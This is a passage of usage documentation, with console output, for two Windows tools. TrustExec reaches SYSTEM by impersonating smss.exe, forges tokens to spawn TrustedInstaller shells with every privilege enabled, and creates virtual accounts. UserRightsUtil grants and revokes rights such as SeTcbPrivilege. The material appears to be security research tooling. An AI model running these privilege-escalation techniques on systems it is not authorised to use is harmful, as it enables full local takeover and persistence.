        + 0 - Leverages SeCreateTokenPrivilege. Uses only --shell flag, --full flag and --command option.
        + 1 - Leverages virtual logon. This technique creates virtual domain and account as a side effect.

For this module, 2 techniques are implemeted. We can specfy technique with -t option. If you set 0 or don't set value for -t option, TrustExec will try to create TrustedInstaller process with create token technique. To get interactive shell, set -s flag.

C:\dev>TrustExec.exe -m exec -s

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3360
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.19043.1526]
(c) Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18

C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeTcbPrivilege                Act as part of the operating system       Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

If you want to add extra group account to token for new process, use -e option as follows:

C:\dev>TrustExec.exe -m exec -s -e S-1-5-20

[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
    |-> SID  : S-1-5-20
    |-> Type : SidTypeWellKnownGroup
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 4392
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\dev>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384

NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE           Well-known group S-1-5-20                                                       Mandatory group, Enabled by default, Enabled group

To add multiple groups, specifies SIDs as comma separated value:

C:\dev>TrustExec.exe -m exec -s -e S-1-5-20,S-1-5-32-551

[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
    |-> SID  : S-1-5-20
    |-> Type : SidTypeWellKnownGroup
[+] "BUILTIN\Backup Operators" is added as an extra group.
    |-> SID  : S-1-5-32-551
    |-> Type : SidTypeAlias
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3104
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\dev>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384

NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE           Well-known group S-1-5-20                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators               Alias            S-1-5-32-551                                                   Mandatory group, Enabled by default, Enabled group

If you set 1 for -t option, TrustExec will try to create TrustedInstaller process with virtual account technique. This technique creates a virtual accound to impersonate as TrustedInstaller group account as a side effect. If you don't specify domain name (-d option), username (-u) and RID (-i option), this module create a virtual account DefaultDomain\DefaultUser. Default SID for domain is S-1-5-110 and for user is S-1-5-110-110:

C:\dev>TrustExec.exe -m exec -s -t 1

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2616
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
    |-> Domain   : DefaultDomain (SID : S-1-5-110)
    |-> Username : DefaultUser (SID : S-1-5-110-110)
[+] Added virtual domain and user.
[>] Trying to logon as DefaultDomain\DefaultUser.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name                 SID
========================= =============
defaultdomain\defaultuser S-1-5-110-110

C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner

C:\dev>exit

[>] Exit.
[!] Added virtual domain and user are not removed automatically.
    |-> To remove added virtual user SID   : TrustExec.exe -m sid -r -d DefaultDomain -u DefaultUser
    |-> To remove added virtual domain SID : TrustExec.exe -m sid -r -d DefaultDomain

You can change domain name and username, use -d option and -u option. To change domain RID, use -i option as follows:

C:\dev>TrustExec.exe -m exec -s -d VirtualDomain -u VirtualAdmin -i 92 -t 1

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3612
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
    |-> Domain   : VirtualDomain (SID : S-1-5-92)
    |-> Username : VirtualAdmin (SID : S-1-5-92-110)
[+] Added virtual domain and user.
[>] Trying to logon as VirtualDomain\VirtualAdmin.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name                  SID
========================== ============
virtualdomain\virtualadmin S-1-5-92-110

If you want to execute single command, use -c option without -s flag as follows:

C:\dev>TrustExec.exe -m exec -c "whoami /user & whoami /priv"

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 1464
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.


USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeTcbPrivilege                Act as part of the operating system       Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

[>] Exit.

If you want to enable all available privileges, set -f flag as follows:

C:\dev>TrustExec.exe -m exec -c "whoami /priv" -f

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2526
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeSyncAgentPrivilege                      Synchronize directory service data                                 Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

[>] Exit.

Added domain and username by virtual account technique are not removed automatically. If you want to remove them, run the sid module as shown in the last output.

sid Module

This module is to manage virtual account created by this tool:

C:\dev>TrustExec.exe -m sid -h

TrustExec - Help for "sid" command.

Usage: TrustExec.exe -m sid [Options]

        -h, --help     : Displays this help message.
        -a, --add      : Flag to add virtual account's SID.
        -r, --remove   : Flag to remove virtual account's SID.
        -d, --domain   : Specifies domain name to add or remove. Default value is null.
        -u, --username : Specifies username to add or remove. Default value is null.
        -i, --id       : Specifies RID for virtual domain to add. Default value is "110".
        -s, --sid      : Specifies SID to lookup.
        -l, --lookup   : Flag to lookup SID or account name in local system.

To lookup SID, set -l flag. If you want to lookup domain or username from SID, specify SID with -s option as follows:

C:\dev>TrustExec.exe -m sid -l -s S-1-5-18

[*] Result:
    |-> Account Name : nt authority\system
    |-> SID          : S-1-5-18
    |-> Account Type : SidTypeWellKnownGroup

If you want to lookup SID from domain name, specify domain name with -d option as follows:

C:\dev>TrustExec.exe -m sid -l -d contoso

[*] Result:
    |-> Account Name : contoso
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818
    |-> Account Type : SidTypeDomain

If you want to lookup SID from domain name and username, specify domain name with -d option and username with -u option as follows:

C:\dev>TrustExec.exe -m sid -l -d contoso -u david

[*] Result:
    |-> Account Name : contoso\david
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser

To remove virutal account, set -r flag. Domain name to remove is specified with -d option, username is specified with -u option:

C:\dev>TrustExec.exe -m sid -r -d defaultdomain -u defaultuser

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2568
[+] Impersonation is successful.
[>] Trying to remove SID.
    |-> Domain   : defaultdomain
    |-> Username : defaultuser
[*] SID : S-1-5-110-110.
[+] Requested SID is removed successfully.


C:\dev>TrustExec.exe -m sid -r -d defaultdomain

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 4696
[+] Impersonation is successful.
[>] Trying to remove SID.
    |-> Domain   : defaultdomain
[*] SID : S-1-5-110.
[+] Requested SID is removed successfully.

WARNING Deleted SIDs may appear to remain until rebooting the OS.

If you want add domain or user SID, set -a flag as follows:

C:\dev>TrustExec.exe -m sid -a -d virtualworld -u virtualadmin -i 97

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3628
[+] Impersonation is successful.
[>] Trying to add virtual domain and user.
    |-> Domain   : virtualworld (SID : S-1-5-97)
    |-> Username : virtualadmin (SID : S-1-5-97-110)
[+] Added virtual domain and user.

C:\dev>TrustExec.exe -m sid -l -s S-1-5-97

[*] Result : virtualworld (SID : S-1-5-97)


C:\dev>TrustExec.exe -m sid -l -s S-1-5-97-110

[*] Result : virtualworld\virtualadmin (SID : S-1-5-97-110)

UserRightsUtil

Back to Top

Project

This tool is to manage user right without secpol.msc. Commands other than lookup require administrator privileges:

C:\dev>UserRightsUtil.exe

UserRightsUtil - User rights management utility.

Usage: UserRightsUtil.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

        + enum   - Enumerate user rights for specific account.
        + find   - Find accounts have a specific user right.
        + lookup - Lookup account's SID.
        + manage - Grant or revoke user rights.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

[!] -m option is required.

enum Module

To enumerate user rights for a specific account, use enum command with -u and d opitons or -s option as follows:

C:\dev>UserRightsUtil.exe -m enum -d contoso -u jeff

[>] Trying to enumerate user rights.
    |-> Username : CONTOSO\jeff
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
    |-> SeChangeNotifyPrivilege
    |-> SeIncreaseWorkingSetPrivilege
    |-> SeShutdownPrivilege
    |-> SeUndockPrivilege
    |-> SeTimeZonePrivilege
    |-> SeInteractiveLogonRight
    |-> SeNetworkLogonRight
[*] Done.


C:\dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105

[>] Trying to enumerate user rights.
    |-> Username : CONTOSO\jeff
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
    |-> SeChangeNotifyPrivilege
    |-> SeIncreaseWorkingSetPrivilege
    |-> SeShutdownPrivilege
    |-> SeUndockPrivilege
    |-> SeTimeZonePrivilege
    |-> SeInteractiveLogonRight
    |-> SeNetworkLogonRight
[*] Done.

If you don't specify domain name with -d option, use local computer name as domain name:

C:\dev>hostname
CL01

C:\dev>UserRightsUtil.exe -m enum -u guest

[>] Trying to enumerate user rights.
    |-> Username : CL01\Guest
    |-> SID      : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
    |-> SeInteractiveLogonRight
    |-> SeDenyInteractiveLogonRight
    |-> SeDenyNetworkLogonRight
[*] Done.

find Module

This command is to find users who have a specific right. For example, if you want to find users have SeDebugPrivilege, execute as follows:

C:\dev>UserRightsUtil.exe -m find -r debug

[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
    |-> BUILTIN\Administrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.

To list available value for -r option, use -l option:

C:\dev>UserRightsUtil.exe -m find -l

Available values for --right option:
        + TrustedCredManAccess           : Specfies SeTrustedCredManAccessPrivilege.
        + NetworkLogon                   : Specfies SeNetworkLogonRight.
        + Tcb                            : Specfies SeTcbPrivilege.
        + MachineAccount                 : Specfies SeMachineAccountPrivilege.
        + IncreaseQuota                  : Specfies SeIncreaseQuotaPrivilege.
        + InteractiveLogon               : Specfies SeInteractiveLogonRight.
        + RemoteInteractiveLogon         : Specfies SeRemoteInteractiveLogonRight.
        + Backup                         : Specfies SeBackupPrivilege.

--snip--

lookup Module

This command is to lookup account SID as follows:

C:\dev>UserRightsUtil.exe -m lookup -d contoso -u david

[*] Result:
    |-> Account Name : CONTOSO\david
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser


C:\dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500

[*] Result:
    |-> Account Name : CONTOSO\Administrator
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type : SidTypeUser


C:\dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"

[*] Result:
    |-> Account Name : CONTOSO\Domain Admins
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-512
    |-> Account Type : SidTypeGroup

If you don't specify domain name with -d option, use local computer name as domain name:

C:\dev>hostname
CL01

C:\dev>UserRightsUtil.exe -m lookup -u admin

[*] Result:
    |-> Account Name : CL01\admin
    |-> SID          : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type : SidTypeUser

manage Module

This command is to grant or revoke user rights for a specific user account. To grant user right, specify a user right as the value for -g option:

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.


C:\dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator

[>] Target account information:
    |-> Username : CONTOSO\Administrator
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
    |-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.

To revoke user right, specify a user right as the value for -r option:

C:\dev>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
    |-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.


C:\dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator

[>] Target account information:
    |-> Username : CONTOSO\Administrator
    |-> SID      : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.

C:\de>UserRightsUtil.exe -m find -r tcb

[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.

To list available value for -g or -r option, use -l option:

C:\dev>UserRightsUtil.exe -m manage -l

Available values for --grant and --revoke options:
        + TrustedCredManAccess           : Specfies SeTrustedCredManAccessPrivilege.
        + NetworkLogon                   : Specfies SeNetworkLogonRight.
        + Tcb                            : Specfies SeTcbPrivilege.
        + MachineAccount                 : Specfies SeMachineAccountPrivilege.
        + IncreaseQuota                  : Specfies SeIncreaseQuotaPrivilege.
        + InteractiveLogon               : Specfies SeInteractiveLogonRight.
        + RemoteInteractiveLogon         : Specfies SeRemoteInteractiveLogonRight.
        + Backup                         : Specfies SeBackupPrivilege.

--snip--

Reference

Back to Top

Acknowledgments

Back to Top

Thanks for your advices about WinDbg extension programming:

Thanks for your notable research:

Thanks for your sample kernel driver release: